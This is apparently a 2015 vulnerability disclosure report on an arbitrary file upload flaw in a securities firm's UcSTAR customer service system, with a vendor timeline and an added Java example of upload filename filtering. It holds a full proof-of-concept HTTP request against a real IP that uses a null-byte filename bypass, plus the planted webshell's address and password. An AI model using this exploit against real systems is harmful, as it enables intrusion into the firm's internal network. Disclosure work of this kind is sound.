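2015-07-06: Details reported to the vendor; awaiting vendor handling
2015-07-08: Vendor confirmed; details disclosed to the vendor only
2015-07-18: Details disclosed to core white hats and experts in related fields
2015-07-28: Details disclosed to regular white hats
2015-08-07: Details disclosed to intern white hats
2015-08-22: Details disclosed to the public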
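Arbitrary file upload vulnerability that can threaten the internal network; requesting a high rank
Anxin Securities customer service system (UcSTAR customer service system). Address: http://119.147.80.161:8002
Although the login page has been dealt with, the upload vulnerability still exists: http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp
By capturing and modifying the request, we obtained the PoC: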
POST http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df190111008b2
Accept-Encoding: gzip, deflate
Host: 119.147.80.161:8002
Content-Length: 2929
Connection: Keep-Alive
Pragma: no-cache
Cookie: XSESSIONID=o4d30tsagvtr

-----------------------------7df190111008b2
Content-Disposition: form-data; name="save"

save
-----------------------------7df190111008b2
Content-Disposition: form-data; name="domainUri"

null
-----------------------------7df190111008b2
Content-Disposition: form-data; name="remoteip"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="userUri"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="seatId"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="seatType"

0
-----------------------------7df190111008b2
Content-Disposition: form-data; name="signId"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="messageid"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="messageType"

1
-----------------------------7df190111008b2
Content-Disposition: form-data; name="chatid"

41413
-----------------------------7df190111008b2
Content-Disposition: form-data; name="userName"

ts
-----------------------------7df190111008b2
Content-Disposition: form-data; name="phone1"

13766666616
-----------------------------7df190111008b2
Content-Disposition: form-data; name="phone2"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="phone"

13766666616
-----------------------------7df190111008b2
Content-Disposition: form-data; name="email"


-----------------------------7df190111008b2
Content-Disposition: form-data; name="revertTypes"

电话
-----------------------------7df190111008b2
Content-Disposition: form-data; name="revertType"

电话
-----------------------------7df190111008b2
Content-Disposition: form-data; name="memo"

ts
-----------------------------7df190111008b2
Content-Disposition: form-data; name="file1"; filename="987.jspx%00.jpg"
Content-Type: image/pjpeg

wooyuntest
-----------------------------7df190111008b2--
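Note that in filename="987.jspx%00.jpg" here, the "%00" needs to be URL-decoded.
The address of the one-line webshell after upload is: http://119.147.80.161:8002/upload/message/9873.jspx  Password: 0q23
Root privileges; the internal network is reachable.
Filter at the upload point; requesting a high rank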
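
One way to do the filtering at the upload point that the report asks for, as an added example that is not part of the original report or of UcSTAR's code. The class name, method name and the image-only extension allowlist are assumptions made for illustration.

```java
import java.util.Locale;
import java.util.Optional;
import java.util.Set;
import java.util.UUID;

// Added example: hypothetical helper, not UcSTAR code.
public class UploadNameFilter {
    // Assumption: the message form only needs image attachments.
    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif");

    /** Returns a server-generated name to store the upload under, or empty if rejected. */
    static Optional<String> storedNameFor(String clientName) {
        if (clientName == null || clientName.isEmpty() || clientName.length() > 255) {
            return Optional.empty();
        }
        // Reject NUL and other control characters instead of stripping them: a name
        // like "987.jspx<NUL>.jpg" ends in ".jpg" for a string comparison, yet the
        // report shows the file landing on disk with a .jspx extension.
        for (int i = 0; i < clientName.length(); i++) {
            char c = clientName.charAt(i);
            if (Character.isISOControl(c) || c == '/' || c == '\\' || c == '%') {
                return Optional.empty();
            }
        }
        int dot = clientName.lastIndexOf('.');
        if (dot <= 0 || dot == clientName.length() - 1) {
            return Optional.empty();
        }
        String ext = clientName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) {
            return Optional.empty();
        }
        // Never reuse any part of the client-supplied name on disk.
        return Optional.of(UUID.randomUUID() + "." + ext);
    }

    public static void main(String[] args) {
        // Constructed sample names; the second is the report's filename after URL-decoding.
        String[] samples = { "photo.JPG", "987.jspx\u0000.jpg", "987.jspx%00.jpg", "a.jspx", "../x.png" };
        for (String s : samples) {
            System.out.println(s.replace("\u0000", "<NUL>") + " -> "
                    + storedNameFor(s).map(n -> "stored as " + n).orElse("rejected"));
        }
    }
}
```

Keeping the upload directory outside any path from which the servlet container executes JSP/JSPX limits the impact if a name check is ever bypassed.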
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-07-08 21:04
Thank you, we have fixed the vulnerability promptly.
None yet